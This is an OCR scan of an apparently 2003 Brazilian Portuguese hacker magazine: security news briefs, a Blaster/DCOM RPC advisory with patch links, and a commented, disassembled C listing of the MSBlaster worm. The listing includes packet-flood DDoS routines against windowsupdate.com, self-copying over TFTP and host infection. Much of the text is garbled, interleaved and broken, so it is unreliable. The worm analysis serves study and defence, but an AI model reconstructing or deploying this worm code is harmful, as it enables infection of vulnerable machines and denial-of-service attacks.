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ções sobre esse tipo de vírus. O result 
mostrando tudo sobre o worm que mob 


te para estudo. a 
Muita gente acha que vírus, wo 


controlar tudo o que passa pelo seu teclado 

E, para finalizar, como não poderia deixa 
Damm Small Linux (uma minúscula distribuição Pascoa 
em Debian) acompanha a edição deste mês. 
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ANGiIVÍPUS Para PDAS 


Palms, Pocket PCs e companhia estarão protegidos 


A Symantec está lançando um antivírus para PDAs, o Symantec Antivírus for 
Handhelds. Ele é feito especialmente para esses computadores pessoais, mesmo que 
eles não tenham tantos problemas com vírus por enquanto. A empresa já está 
prevenindo os usuários de portáteis desse mal que, mais cedo ou mais tarde, 
certamente virá. Com a crescente popularização desses aparelhos, contendo 
múltiplas conexões a outros periféricos e à Internet (como a wireless), a chance de 
começar a aparecer vírus por todos os lados é grande. 

Mesmo que a Symantec tenha lançado esse antivírus agora, ela sabe que seu 

único propósito é a prevenção. A empresa admite que é muito dificil atualmente 

se desenvolver um cavalo de tróia para um PDA 


CÓDIGO Para cóPia De DUDS 
Ê PPOIBIDO NO GerPiGÓRIO 


norGe-americano 
DecCSS é ilegal agora 


A justiça americana, pelo tribunal da Califórnia, está banindo 
de circulação o programa DeCSS (De-Content Scrambling 
System), conhecido por quebrar o CSS — código de segurança 
anticópia para DVDs. 


MiCPrOSOFE USa O LiNUM 
contra uirus 


Empresa resolveu preparar-se bem 


Depois algum tempo já na Web, o DeCSS foi levado a julga- 
para o ataque 


mento pela DVD Copy Control Association (DVD CCA), q 
tenta evitar a replicação de DVDs pelo programa em questão. 
Quando a coisa aperta, o jeito é pedir ajuda para a melhor Anteriormente, o DeCSS foi levado a tribunal, mas a sentença 


solução. E a própria Microsoft reconhece que a melhor definiu que a proibição de publicar o código na Netia contra a 


solução é o Linux. Com a ameaça causada pelo vírus Blaster, 
que mandaria as máquinas infectadas fazer um ataque Denial 
of Service ao site de update da Microsoft, a empresa não 


teve o que fazer senão comprar um espaço extra de hospe- 3 
dagem na Akamai, com uma rede global de 15 mil servidores pnessraça POUCA e spaaGEM 
Linux. O medo aumentava à medida que mais e mais compu- Marinha dos EUA leva 20 dias para es 


tadores iam recebendo a praga, que forçava o computador a brir roubo cracker 
reiniciar a todo momento. 


rce- 


, > A p Jespe 
Mesmo assim, a ameaça ainda era grande. A sorte da empresa foi eração que inacreditavelmente passou qesF 


UN op 
Em uma megaop m invadir 


que o vírus tinha uma falha: atacava o site windowsupdate.com, 
em vez de fazê-lo contra o windowsupdate.microsoft.com. Como 
o primeiro é um endereço de redirecionamento, bastou à empresa 
interromper esse tráfego para não ter problemas com o ataque. 


mês, crackers americanos conseguira 


ja por jase um 
bida por quas os números 


nha dos Estados Unidos e roubar 


mas da Marinha 
r r despesas do 
Ftões de créditos usados para paga! despesas 


acesso às últimas 


os sister 
mil ca 


governo. Além disso, também tiveram 


Mesmo assim, o caso tornou-se um emblema de como a empresa 


; faturas 
realmente tem, no Linux, a sua solução ideal na área de servidores. 


O Citibank, que admi 
ocorrido, nenhuma fraude ou ativ 


nistra os cartões, informou que, apesar do 


idade fora do nor mal foi 
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cumençário 

acHEers GanHam DO IE 

ato od EO holandês “Hippies from Hell” é o destaque 
UWiNDOLS 


Nova técnica recebe A Holanda é um pais célebre pela-sua guitur 


comandos direto do chat [EerrfFajgiuteoa principais filmes já 
feitos sobre o mundo hacker, *Hipples 


a underground. Fazendo jus a essa fama, é de lá que 


O canto preferido dos hackers na from Hell” e o” A 
netse transformou em mais uma Para quem não sabe, o nome do longa ' “ ns É 
base de ataque contra o Windows. ESSE aca hackers, “ 
Redes de IR€ (Internet Relay Chat) técnicos, artistas e escritores prolandis EN 
estão sendo usadas para invadir o ses, responsável por diversas ingiaçtEs 
falho sistema da Microsoft. Para isso, AReMNmE Teia o Noise (ciel década de 80. 
são usados vários tipos de exploits, “Hipples from Hell” é o primeiro filme EV: 


on-line do programa Waag Connect, 


incluindo um que explora a recente 
criado pela Waag Society 


falha descoberta no serviço Remote um projeto a 
Procedure Call (RPC). para oferecer ao público um SSpes hackers européias ao ar livre, o do! 
Os hackers on-line usam os progra- Além de mostrar várias conferências hac a RE MERO 
É N ; 
mas para comprometer servidores contém o nascimento ão tor us uma chave para tal ato. 
Windows e controlá-los remotamen- abrir uma tranca sem danificá-la ou = hacker Hack-Tice, em 1993, eles deram início ao que 
blicoua revista ni É 
te através das redes de IRC. Nos anos 80, 0 grupo pu 


meiro provedor holandês de Intel 


b imental. 
rede pública cultural e expert 
= É cumentário também 


me dado à arte de se 


ret, o xs4all. 


io, técnicos da Symantec seria o pri : site oficial, http:// 
na que se a um Leia a seção Subculture para saber mais sobre O filme, ou acesse O 
worm, mas analisando arquivos hippiesavaag.org 
deixados para trás em um servidor E E: 
atacado, chegaram à conclusão de comunicação anoniima 
que se tratavam de exploits. Os Ferramenta hacker usa spoofing para ocultar remetentes de dados 
programas têm sido acoplados para 
criar uma ferramenta de ataque Os hackers que reme- 
remoto. Eles são classificados como tem dados sensíveis 
autorooters e atuam como um IRC ela internet e pre- 
bot, escutando canais da rede IRC e ea ficar no a E ! ac K H zá t 
recebendo comandos dos atacantes nimato agora con- - 
a partir dali. A ferramenta também tam com mais uma 
pode escanear e comprometer alternativa que promete facilitar bastante a comunicação com outros especialistas, 
computadores vulneráveis à falha no Trata-se do NCovert, uma ferramenta de comunicação que utiliza técnicas de spoofing (disfarce) 


RPC do Windows. para ocultar a fonte das informações e dados que trafegam pela Web. 

Grosso modo, o NCovert cria um canal secreto de comunicação, no qual esconde quatro caracteres 
de dados do ISN (Inicial sequence Number) dos cabeçalhos, que, nos pacotes de dados de uma 
- Tede, são os campos responsáveis por informações vitais sobre a origem desses mesmos: 
8 pacotes, como os endereços IP (Internet Protocol). 

A ferramenta foi apresentada durante uma conferência hacker em Los Angeles, a Black 
Hat Briefings. Lógico que ela poderá ser usada para fins escusos, mas, de um modo geral, 
é uma excelente opção para pessoas que, por motivos de força maior, precisem ter sua 
identidade preservada (como certas testemunhas em processos judiciais). 

A técnica do NCovert terá mais dificuldade de ser aplicada com o IPv6, mas para o 
criador da ferramenta Mark Lovelace, pesquisador sênior em segurança da empresa 
BindView, a nova versão do IP trará, em compensação, mais dados que poderão ser 
ocultados nos cabeçalhos. 


Site: www. bindview.com 
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ão São. 


Inerabilidades utiliz pelo E 
voltam com o te Vuli 


pl am-se novas ameaças depois de um 


A CULPA É DOS OUbPOS 


Começou o contra-ataque, Scott Charney, chefe de estratégia de seguran- 
ça da Microsoft, afirmou durante a conferência TechEd que a maioria 
os “paus” no sistema Windows é causado por códigos mal-feitos de 

programas de terceiros. 


Chefe de segurança da Microsoft nega problemas 


no código 


e 
problemas no código feito pela | Microsoft, e sim por código ce programas d 
terceiros”, pedindo assim um maior rigor nos testes dos softwares lançados 
Assim, da próxima vez que'o Windows der pau quando você abrir o Internet 


Charney estava analisando os resultados da ferramenta de diagnósticos 
Explorer, lembre-se: a culpa é de terceiros. (contribuiu K Dash T34) 


ir n 
Dr.Watson. Segundo o executivo, “metade dos crashes no Windows n 


para rodar no sistema operacional da Microsoft. 


Sibe Da sco é dbdCcaDo por 
memBro na ComuninaDe prep 
SOFGUIare 
Eric Raymond não 
aprova essa atitude 


Depois de processos e mais proces- 
sos envolvendo a SCO e a IBM pelo 
possível uso indevido de códigos do 
Unix (de propriedade da SCO) em 
distribuições Linux, o site oficial 


daquela empresa vem sendo alvo de vários ataques. O último deles foi 

novamente um Dos, feito, segundo Eric Raymond, por um membro muito 
antigo da comunidade Free Software e da infra-estrutura da própria 

Internet. Raymond diz não saber exatamente a identidade do cidadão, mas 
acrescenta que não é com ataques de Dos que a situação entre a SCO e O 
Free Software vai ser solucionada do jeito que os representantes desta 
comunidade querem. Pelo contrário, a investida poderá dar à disputa 
proporções muito maiores e mais difíceis do que se imaginava, como mais e 
mais processos, não mais brigando por patentes, mas também relacionados a 
outras situações geradas pelos ataques. 


solução para esse Caso, mas, enquanto 
site da SCO devem parar e à briga, ser 


Parece que está longe de haver uma 
ele está em tramite, os ataques ao 


resolvida somente nos tribunais. 
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zos só nos EUA, Realmente, para um virus-desses dar 


ribuí-lo via foto porrográfica — ninguém resiste: 


O worm usa seu próprio engine SMTP para se espalhar e tenta criar. 
consegue, por causa de falhas nocódigo. O SoBig;F foi colocado, pela 
primeira vez, num site pornô, e todas as pessoas que clicaram num link 
O virus já bateu o recorde de velocdade de infecção, causando mais de 


umacópia de si mesmo emredes abertas; mas, felizmente, ele não: 
Apesar de estar configurado para se autodesativar em 10 de setembro, 


que levaria a uma foto de sexo acabaram sendo infectados, 


W32.S0Big.FOmm, ou somente SoBig.F 


8 2 
co WU 
ES 
2 8 
& > 82925 
um E ES = o 
mê o so GEE 
[=| ro] o 2:55 2c 
EE na 
so Epa GU CracHer 
N oo n y . A 
[e=] = S.ESE FTP do projeto GNU é 
RM) site = 
mol? sos crackeado 
o v — Ea » 
[ço] vv DOxX sa 
Do a E go E hei 
E 5 So Emo LE Nem mesmo o projeto GNU, patrocinado pela Free 4 
. [= = o ss S o Software Foundation, escapou dos crackers. 
um a es 9 E = £ E Recentemente, foi descoberto um trojan nos servidores FTP do projeto, que foi retirado do 
«<L E 
ER 2.6 E es 8 = ar para análise dos diversos softwares que estavam armazenados. 
[e] E s E DE o) Ss Os responsáveis suspeitam que o trojan estava instalado desde março de 2003. O objetivo 


do cracker era coletar senhas e usar o servidor como ponto de partida para outros 


é) 


ataques. Apesar disso, os responsáveis pelo projeto decidiram fazer uma varredura em 

todos os arquivos guardados lá, para evitar contaminação. Assim, muitos arquivos ainda 

não estão disponíveis. Por-via das dúvidas, se você baixou algum programa do FTP do 
GNU recentemente, seria bom dar uma geral no seu computador 


. 
Sá 
28) 


a PLayer aBreseu | 
+ CoMmPuGaDor 

Código malicioso pode ser usado através di 
player 


É Se você temo Real Player, um dos mais populares players para áudio e vide 
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LINUH INSEGUr 0? 
Servidor de FTP permite axecuções de 


comandos indevidos 


Se você é um daqueles que pensam que só o Windows e os 
softwares que rodam nele são vulneráveis a invasões hackers, 


está na hora-de rever seus conceitos 
Recentemente, uma falha que possi 


overflow (transbordamento de buffer) foi descoberta no 


servidor FTP para Linux WU-FTPD. 


Os ataques buffer overflow ocorrem quando um buffer (área 


temporária de armazenamento de 


E = rootespike:- - Konsole - Konsole 
File Sessions Settings Help 


ilita ataques do tipo buffer 


lados) recebe mais informa- 


ções do que é capaz de guardar. Quando isso acontece, os, 
dados literalmente “transbordam” para outros buffers, corrompendo ou sobrescrevendo dados que estejam neles. Os dados “transbor- 


dantes” são; então, usados por hac 
A vulnerabilidade do WU-FTPD se en 


ers para dar instruções ao sistema e quebrar sua segurança. 
contra na função “fb. realpath()",-que calcula o tamanho de uma string (sequência de símbolos ou 


valores) concatenada. O erro permite que, por meio do buffer overflow, um hacker execute comandos com privilégio de root. 


O problema afeta as versões de 2.5.0 até 2.6.2 e pode ser explorado em sistemas Linux com kernel nas versões 2.0.x ou 2.4.x. O erro já 


foi corrigido mediante um patch, dis 


Brechas no kernel 


onível no site 


org. 


Aliás, o.próprio kernel 2.4.x possui falhas que, além de permitirem que usuários locais tenham acesso privilegiado ao sistema ou possam 


expor informações sensíveis, também possibilitam ataques do tipo Dos (Denial of Service, ou negação de serviço). 


O alerta foi dado pela Red Hate divu 


corrigir as vulnerabilidades (m/mww.securityfocus. com/ar 


precisa baixar e instalar a correção no site da empresa. A falha permite que o programa 
abra arquivos SMIL (Synchronized Multimedia Integration Language), linguagem de tags 
criada pelo consórcio W3C para transmissão e reprodução de arquivos de mídia, com 
scripts em JavaScript ou em VBScript que poderiam ameaçar o computador do usuário. 
Navegadores como.o Internet Explorer 5.5 ou superior e alguns programas, entre eles o 
Rea Player, aceitam esse tipo de arquivo SMIE: ; s 


Igado no site Security É focus. com/bia/8233). Felizmente, já existem formas de 
g y ] 


BLASTER 


por Fernando Giannaccari - psyOpsbox.org 


um interesse maior nesta matéria, pois se trata 
de uma falha recente e perigosa para servidores 


Windows de todos os portes. 


Falha: DCom RPC 

Nível: Crítico 

Sistemas afetados: 
* Microsoft Windows NT 4.0 
* Microsoft Windows 2000 
* Microsoft Windows XP 


* Microsoft Windows Server (TM) 2003 


Mais precisamente: 


; “Microsoft Windows 2000 Advanced Server SP4 
Microsoft Windows 2000 Advanced Server SP3 
Microsoft Windows 2000 Advanced Server SP2 
* Microsoft Windows 2000 Advanced Server SP1 
Microsoft Windows 2000 Advanced Server 
“Microsoft Windows 2000 Datacenter Server SP4 
À Microsoft Windows 2000 Datacenter Server SP3 
Microsoft Windows 2000 Datacenter Server SP2 
Microsoft Windows 2000:Datacenter Server SP1 
E Microsoft Windows 2000 Datacenter Server 
Microsoft Windows 2000 Professional SP4 
Microsoft Windows 2000 Professional SP3 
Microsoft Windows 2000 Professional SP2 
Microsoft Windows 2000 Professional SP1 
Microsoft Windows 2000 Professional 

Microsoft Windows 2000 Server SP4 

Microsoft Windows 2000 Server SP3 

Microsoft Windows 2000 Server SP2 

Microsoft Windows 2000 Server SP1 

Microsoft Windows 2000 Server 

Microsoft Windows NT Enterprise Server 4.0 SP6a 
Microsoft Windows NT Enterprise Server 4.0 SP6 


novamente para a revista e peço aos leitores 


| Falha de RPC (Rem: 


rimeiro, agradeço a oportunidade de escrever Mostrarei, passo a passo; como a falha e o novo tormento: 
da Microsoft, o Blast.worm, trabalham em conjunto para dar 
dor de cabeça aos administradores de sistemas (Windows). 
Além disso, conheça métodos de prevenção, correção e eli- 


minação de ambos, worm e falha. 


Microsoft Windows NT Enterprise Server 4.0 SP5 
Microsoft Windows NT Enterprise Server 4.0 SP4 
Microsoft Windows NT Enterprise Server 4.0 SP3 
Microsoft Windows NT Enterprise Server 4.0 SP2 
Microsoft Windows NT Enterprise Server 4.0 SP1 
Microsoft Windows NT Enterprise Server 4.0 
Microsoft Windows NT Server 4.0 SP6a 

Microsoft Windows NT Server 4.0 SP6 

Microsoft Windows NT Server 4.0 SP5 

Microsoft Windows NT Server 4.0 SP4 

Microsoft Windows NT Server 4.0'SP3 

Microsoft Windows NT Server 4.0 SP2 

Microsoft Windows NT Server 4.0 SP1 

Microsoft Windows NT Server 4.0 

Microsoft Windows NT Terminal Server 4.0 SP6a 
Microsoft Windows NT Terminal Server 4.0 SP6 
Microsoft Windows NT Terminal Server 4.0 SP5 
Microsoft Windows NT Terminal Server 4.0 SP4 
Microsoft Windows NT Terminal Server 4.0 SP3 
Microsoft Windows NT Terminal Server 4.0 SP2 
Microsoft Windows NT Terminal Server 4.0 SP1 
Microsoft Windows NT Terminal Server 410 
Microsoft Windows NT Workstation 4.0 SP6a 
Microsoft Windows NT Workstation 4.0 SP6 
Microsoft Windows NT Workstation 4.0 SP5 
Microsoft Windows NT Workstation 4.0 SP4 
Microsoft Windows NT Workstation 4.0 SP3 
Microsoft Windows NT Workstation 4.0 SP2 
Microsoft Windows NT Workstation 4.0 SP1 
Microsoft Windows NT Workstation 4.0 
Microsoft Windows Server 2003 Datacenter Edition 
Microsoft Windows Server 2003 Datacenter Edition 64-bit 


O Bug utilizado pelo 
Worm Blaster 


Microso A 
Microsoft Windows Server 003 Enterprise Edition 64-bit 
Microsoft Windows Server 2003 Standard Edition 
Microsoft Windows Server 2003 Web Edition 

Microsoft Windows XP 64-bit Edition SP1 

Microsoft Windows XP 64-bit Ec 
Microsoft Windows XP Home SP1 
Microsoft Windows XP Home 

Microsoft Windows XP Professional SP1 
Microsoft Windows XP Professional — 


Worm: 


Foi desenvolvido um worm = chamado W32 E 
conhecido como Lovsan ou MSBlast), que explora'a talha 
espalha por toda a rede, direcionando inclusive sua. preci 
conexão a um ataque direto à pagina do Windows Updates 
uma mensagem sugestiva, mas verdadeira, diga-se'de pa 

“| just want to say LOVE YOU SANH! 

billy gates why do you make this possible? Stop mal 
money and fix your software!” 

Que quer dizer: 

“Eu só queria dizer que TE AMO SAN!!! 

bill gatezinho, por que você torna isso possível? Pare deifazer | 
dinheiro e conserte seu software!" ; 

Ele explora a falha acima descrita para se espalhar e seu objetivo 
é o ataque à pagina do Windows Update, por meio do bombardeio 
de pacotes múltiplos (DDosS). 

Dá-se da seguinte maneira: o worm se conecta pela porta vulne- Fê 
rável (135) e inicia o download de um software, que será usado em 4 
um ataque de Distributed Denial of Service (DDos) ao site da: 
Microsoft windowsupdate.com no dia: 16 de agosto. 

Hoje, já existem duas variantes do virus: Blaster-B e adivi 
nhem, Blaster-C, mudando, no caso do C, somente o 
ncipal (de msblast.exe para teekids.exe ou penis32, 
rma de compressão de dados, mas ambos continua 
mesmo códig E 
variantes se 
deixar o antivi 


Sistemas não afetados: 


Microsoft Windows Millennium Edition 


de 


cações 


ite de pedido de 


idade pode resultar em execu- 


bitrária de códigos maliciosos com privilégios de admi- 


“escuta”, São elas: 139, 135, 445 e 593, 


ão do DCOM, 
(Detalhe para a 69: do tftpd) 


idade explora um “buffer overrun” remoto: via 


interface DCOM RPC, que roda na porta 135 tcp/udp do 


Ela também pode se expor a outras portas que o RPC EM 


Não foi confirmado ainda, mas sob algumas mo 


A exploração dessa vulnera 
configuração, o REC EM pode u 


Vulnerabilidade: 


Windows. A falha se deve à falta de um 
ção arl 


checagens de ativa 
nistrador local da máquina. 


(Endpoint Mapper 


"Recomendações: 


Bloqueie o acesso externo por meio de um firewall deisua preferência, 
via porta tcp/135, além de explorar essa falha: OS acessos externos à ela 


para endereços seguros ou somenie internos deiredel 
A implementação de múlkiplas camadas de sê 
remotas de ataque. 


BLASTER 


Utilitário de remoção: 


Para você que é hospedeiro do 
vírus ou apresenta os sintomas bási- 
cos, (RPC Failure e rebooting), pe- 
gue o kit de remoção: 


http:// 
securityresponse.symantec.com/ 
avcenter/FixBlast.exe 


Você deve proceder desta maneira: 

Enquanto o seu computador esti- 
ver inicializando, aperte F8 e selecio- 
ne SAFE MODE (Modo de Seguran- 
ça). Uma vez dentro, rode o arquivo 
FixBlast.exe e espere pela remoção. 


Correções: 


Estamos de acordo que algo deve ser feito depois de removido ou após o proces» 
so de prevenção do worm. Temos que corrigir a falha: Para isso, a Microsoft lançou 


Rode novamente em caso de qual- É = à 
q patches de correção para cada versão afetada. Basta dar download e executá-los 


para ter sua falha corrigida. 
* Alguns patches requerem pelo menos o Windows Service Pack 1 


quer dúvida. 

Feita a remoção do Worm, rode o 
Patch da Microsoit (endereço de 
download abaixo) e livre-se de EK e 
Você pode encontrá-los em: 
encrencas. 

Microsort Windows: 2000 Advanced Server SP4: 
Microsoit Patch Wihdows2000-KB823980-x86-ENU exe 
hittp://microsoftcom/dowinloads/details aspx?Familyld=C8B8A846-F541-4C15-8C9F-2203544491 17&displaylang=en 


Microsoft Windows 2000 Advanced Server SP3; 
Microsoft Patch  Windows2000-KB823980-x86-ENU exe 
hittp://microsofticom/downloads/details.aspx?Familyld=C 8B8A846-R54154C15-8C9F-2203544491178displaylang=en 


* MicrosoftANindows 2000 Acuanced Sener SP2, Microsoft Windoiws 2000 Datacenter Server SP4, Microsoft Windows: 2000 
Datacenter Server SP3) Microsoft Windows 2000 Datacenter Server SP2 e Microsoft Windows 2000 Professional SPA: 
Mikrosort Patch  Windows2000-KB823980-x86-ENU exe E 

http://microsoit. com/downloads/details.aspx?Familyld=C388A846-F541-4C15-8C9F-22035444077&displaylang=en 


Microsoit Windows 2000: Projessional SP3; 
Microsoft Patch Windows2000-KB823980-x86-ENU.exe 
http://microsort:com/downloads/details.aspx?Familyld=C8B8A846-F541-4015-8C9F-2203544491178&displaylang=en 


Mictosoit Windows 2000 Professional SP2' e Microsoft Windows.2000' Server sp4; 
Microsoft Patch  Windows2000-KB823980-x86-ENU exe: 
hittp://microsoft.com/downloads/details.aspx?Familyld=C8B8A846-F541-4015-8C9F-2203544491 17&displaylang=en 


Microsoft Windows 2000 Server Sp3 


Microsoft Pale |yipdows2000:K88 KB823980- x86-ENU.exe 

http://microsoft. com/downloads/7 
detalls.aspx?Familyld=C8B8A346-554]-4C 15-8C9F- 
2203544491 17&displayiang=en 


Microsoft Windows 2000 Server SP2 e Microsoft Windows 
NT Enterprise Server 4,0 SPba: 
Microsoft Patch/QB23980j EXE 
http://microsoft.com/downlbads/ 


details.aspx?Familyld=2CC66F4E-217E-4RA7-BDBF- 
DF77A0B9303F&displaylang=en 


Microsoft Windows NI Server 40 SP6a: 
Microsoft Patch 0823980 EXE 
http://microsoftcom/downloads/ 
details.aspx?Familyld=2 CC 66R4E-217E-4FA7-BDBF- 
DF77A0B9303F&displaylang=em 


Microsoft Windows NT Terminal Server 4/0 SP6a: 
Microsoft Patch Q8239801.EXE 
http://microsofticom/downloads/ 

details .aspx?Familyld=6COFOM60-64FA-424C-A3C = 

C9FAD2DC65CA&displaylang=en 


Microsoft Windows: NT Workstation 4.0 SP6a: 
Microsoft Patch) Q823980 EXE 
http://microsoft.com/downloads/ 

details.aspx?Familyld=2CC66R4E-217E-4FA7-BDBF- 

DF77A0B9303F&displaylang=en 


icrospão o Server MR RR 


Microsoft Windows Server 2003 Enterprise Edition: 
Microsoft Patch WindowsServer2003-KB823980-x86- 
ENU.exe 
http://microsoft.com/downloads/ 
details.aspx?Familyld=F8EOFF3A-9F4C-4061-9009- 
3A212458E92E&displaylang=en 


Microsoft Windows Server 2003 Enterprise Edition G4-bit: 
Microsoft Patch WindowsServer2003- SR ja64- 
ENU.exe 
http://microsott.com/downloads/ 
details.aspx?Familyld=28566973-C3F0-4EC 1-995F- 
017E35692BC7&displaylang=en 


Microsoft Windows Server 2003 Standard Edition : 
Microsoft Patch WindowsServer2003- o 
ENU.exe 
http://microsoft.com/downloads/ Ê 
details.aspx?Familyld=FSEOFR3A-9F4C-4061-9009- i 
3A212458E92E&displaylang=em 


Microsoft Patch) WindowsServer2003-KB823980-x86-ENU.exe 
http;//microsoft.com/downloads/ 
details aspx?2Familyld=FSEOFF3 A-9F4C-4061-9009- 
3AZ12458E92E&adisplaylang=en 


Microsoft Windows XP 64-bit Edition SP4! 
Microsoft Patch WindowsXP-KB823980-ia64-ENU. exe 
http://microsoft.com/downloads/ 
details.aspx?Familyld=1BODF5DF-4A85-488F-80E3: 
C347ADCC4DF1 &displaylang=en 


354406C-C5B6-44AC- ERR 
aylang=en 
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MSBlaster worm; também conhecido como 
Covesan, MSBla tou, simplesmente, Blaster, é 
“Um dos casos de maior aproveitamento de 
Merabitd des que se tem notícia. 


foi escrito em linguagem Ss 
(um compilador € gratuito que 


E gera executáveis extremamente pequenos), internamente, O 
— Alualmente, a exploração de falhas, aliada à falta de atualiza- worm faz uso de um exploit (conhecido como DCOM), ho 


ções e cuidado dos usuários, tem sido um dos caminhos para qual criptografa os dados através de XOR: 
LUMA 
// unsigned long class a, class b, class c; 


// MSBlaster Worm unsigned long tl, tê, €3, t4, unknown duorde, 
7/ ThreadID; , 
VE 
to por: 
VE 
Re/7 


= Codigo original disassemblado e reescri- tinsioned long mysterious duord = 1, | 
mystery dvord?2 = B; , 
char filename[9x184], *msblast = 


“msblast.exe”; 


* struct sockaddr cp; 5 
r in; 


E 


“numerico (Re- 


E, SetIpAdoy( eh 
As : 
= sa E Wliesores 
if E ESA! 


FE T E 


rmações e código-fonte comentados 


nt ; . 8! | E E A Escrito por Marcos Velasco 
| sá marcosQvelasco.com.br 
http:/Avww.velasco.com.br 


// Retorna o total obtido 
return aceum; 


EAX 
long *) [ 
); 


*[ (unsigned 
PESE) ) 


// Controi e envia pacotes RR 
void build and send packets[ unsigned long: 


pbre os dados passados nsipacdr a 


// Gera um ca 
y SA f 


(usado nos pac 
unsigned int che 


struct sockaddr to; 
char buf1[0xC]; 
char buf[9x64]; 


sum( char *checkdata, 
Zength ) 


í q 
E = sb ds char name[0x10]; 
E e — int var 9c; 
ço 8 : 
unsigned long accum = 5, accumê, accum3; 
E memset([ Gbuf, D, BO ); 
unsigned int guapuoro; 
E x 
; 5 /)' Indciali ist domi 
// Obtem o ca teto “do tamanho da string 2“ Aa paga epa d sAnPDaico 
Des srand( GetTickCount() ); 


//. primeiro) byte; saltando de 2 em 2... 
for (à = checklength; 1 > 1; 1 -=2/) 
currworg) = (Unsigned int) 
checkdatal5]; 
accum += curruoro; 


// Obtem um IP e tenta resolver o DNS 
sprintf(' name, “%i,%i.%1.%1”, class a, 
class b, rand() % ess, 
rand() & 255 ); 
GetIpAddy( name); 


j += 25 
) da // Constroi um pacote de dados 
e R E to.sa family = 2; 
1d =" i Ê a sprintfl sa data, “%d”, htons[( 
7 4. uai 
f 1 à 


accum/ += (unsigned short) checko) 


+ 2]; E 
) A E 
E E É 
accumê = aceum); Ed , 


unsigned int) 6; 


E accum? >>= 1B:; 


accumS & faccum;. plane: short) 
aecum3 E= (odio long) 9xS9SBFFEF 
aceum = acoume; 


E e 


loxes), 
[ signed in ) ht 


accum += accum3; 
accumê = accum; 


accumê >>= 16; 
accum += accumê2; 


accum = caccum; 


accum 6= (unsigned long) 8xB985 
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buf[0x4A] [unsigned int) 6; 3 


buf[9x4C] = [unsigned int] 6; 

sprintf( Gbuf1[4], “%d”, msipaddr ); sockoptsretuval = setsockopt( E BX, NULL, 
buf1[8] = [unsigned short] 6; 2, Goptval, [unsigned long] 4 ); 

bufi[9] = [unsigned short) 6; if ( sockoptsretval == -1 ) 

buf1[19] = [unsigned int] htons( 9x14 ); ! 


return; 
sprintf(l Ebuf [8x5C] » “%d”, msipaddr )J; ) 
buf[9x30] = (unsigned int] htonsl (rand() // Faz a constaue “envio dos pacotes 
%& 1999) + 1980 ); while sad 
A f - 
var Se = rand[); build and send packets( ipaddrms, 
var. Se <e= 18; E socketms ); 
var Se |= rand(]; Sleep 
var 9c &= [unsigned long] S9xBSBSFFFF; ) 
buf[9x49] = [unsigned int] htons[ var Se // Finaliza socket E 
dl; ERR closesocket[ socketms ); a 
sprintf( Gbufl[9], “xd”, msipador ); ) 
memcpy( Gbuf, Gbufl, GxC ); 
memcpy( Gbuf[8], Gbuf[9x38], 0x14 ); // Envia Uma copia de si proprio para um de- 
buf[9x40] = [unsigned int] checksum( buf, terminado IP 
8x25 ); void -— stdcall send copy of self() 
memcpy( Gbuf, Gbuf[9x50], 8x14 ); ( 
memcpy( Gbuf[0x14], Gbuf[0x3C], 0x14 ); char buf[0x284]; 
memset( Gbuf[9x28], [unsigned int] bp, 4 struct sockaddr name; 
na E struct sockaddr from; 
buf[9x5A] = [unsigned int) checksum( buf, struct sockaddr to; 
- 0xe8s ); 5 ã se É unsigned long tolen =) 16, readien; 
memcpy( Gbuf, Gbuf[9x59], 8x14 ); " Unsigned short int var 284, var PS2, 


var 285, i = 6; 


// Envia o pacote. E s 
sendto( ss, buf, Gx28, NULL, Eto, 0x18 ); int some global var = 1, fromlen, filelen 


// Faz o ataque DDoS ao site . 
b windowsupdate.com da Microsoft 
“Void — stdcall AttackMS() 
E 5 e A So 


FILE *thisfile; * 


// Inicializa 
if ( [5 = socke: 


“Unsigned long E 


ES ip: dorms, socketms 
sockoptsretval, optval = 1 ; 


goto. fhis Joc ret; 


EE 


-asm mov E BX, ebx — 


' memset[ Ename, 8, 8x18 


// Obtem o IP ane. By - 2; dm 


jsar a porta 69 


run fe 


E; 
à sprintfl name.sa data, 
“socketms = WSASocket; 
E NUDIS )s Pesa 
1f [ socketms ==. qe apa) 
E e ; 


Teturn; 


if ( [recufrom( s, Gbuf, exes4, 
Gfrom, Gfromlen )] == -1) 
í 


“ goto this loc ret; 


DM Fa 

proprio] em | 

if [ ![thisgi 

03 ; 
.. 

! goto this loc ret; 

y S E , 


// Loop para envio dos dados 


send self loop: | 


i++; 
var 294 = htons( 3 ) == 
var 292 = htons( i )J; 


readlen = fread( Gvar 290, 1, e6x2s6, 


thisfile ); 
readlen += 4; 


// Envia parte do arquivo 


Gto, tolen )JJ < 12] 
( 


goto fclose it; 


// Aguarda quase 1 segundo 
Sleep( 990 ); 
if ( readlen < 9x2e84 ) 
f 
goto send self loop; 


// Fecha arquivo 
fclose( thisfile ); 
goto thislloc ret; 


fclose it: ; 
if ( ! ((unsigned long) thisfile) 
f 


goto this loc ret; 


E // Fecha arquívi 
; fclose( thisfile ); 


this-loc ret; 
// Fecha socket 
closesocket( s J; 


NULL, 


a do arquivo (de si 


ppenl' filename, 


if ( [(sendtol s, Gvar 204, filelen, 


) 


// Termina thread 
ExitThread( 8 J; 


// Incrementa IPs 

void inc tvals() 

! 

inc tvals start: 
// Estah no limite da parte final do IP 

[xxx. xxx. xxx. ARA) 2 
if ( t4 > 254 ] 


( 
t4 = 8; 
t3++; 
) 
else 
f 
t4++; 
return; 
) 


// Estah no limite da 3a. parte d 
(xxx. xxx. D99 xxx) ? a 
if ( t3 > 254 ) 


f 
Ess="9 
te++; 
fe 
else 
f 
t3++; 
return; 
) 


// Estah no limite da 2a. parte do 
(xxx. 899 .xxx. xxx] 2 j 
if ([ te > 254) 


| 
| 
| 
| 
| 


| 
| 
| 
f 
| 
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// Infecta Host 
—edecl infect host( SOCKET s, 


HANDLE hDbject; 
SDCKET sploit socket; 
ruct sockaddr name; 
char cmdbuffer[512], fake sockaddr[8x15], 
Xx378 + Bx2CC + 0x3C]; fS 
har “buf2[9x48], ipofsendingbox[8x18]; 
igned long é E ThreadID; 


code = 8, namelen; 


Rs + e, t É, X' 3 E / Acessa via IEA 

Ê in .8 e 
Í - memepy( buf 4 nx y xi rintf( name.s: ata, 
f memepy (O buf . ê 


memepyl 


*[ [unsigned long 


ad) long). Dx1BB; 


signed long *) 


Long] 0X1B6; 
memepy | but + 0x370 + 
memepy( buf + 8x378 + 

Dx98/); 

*( O [unsigned Long +) but[s 

[unsionsd! Tong)! Bx20s; 

H( [unsigned Long *) bur[9x: 

[unsigned long) sxecs; 


'( [Unsigned long *) buz/9xE 


oned long; 


*[ (Uumsioned Hj buz[0xE 


oned) lona) 
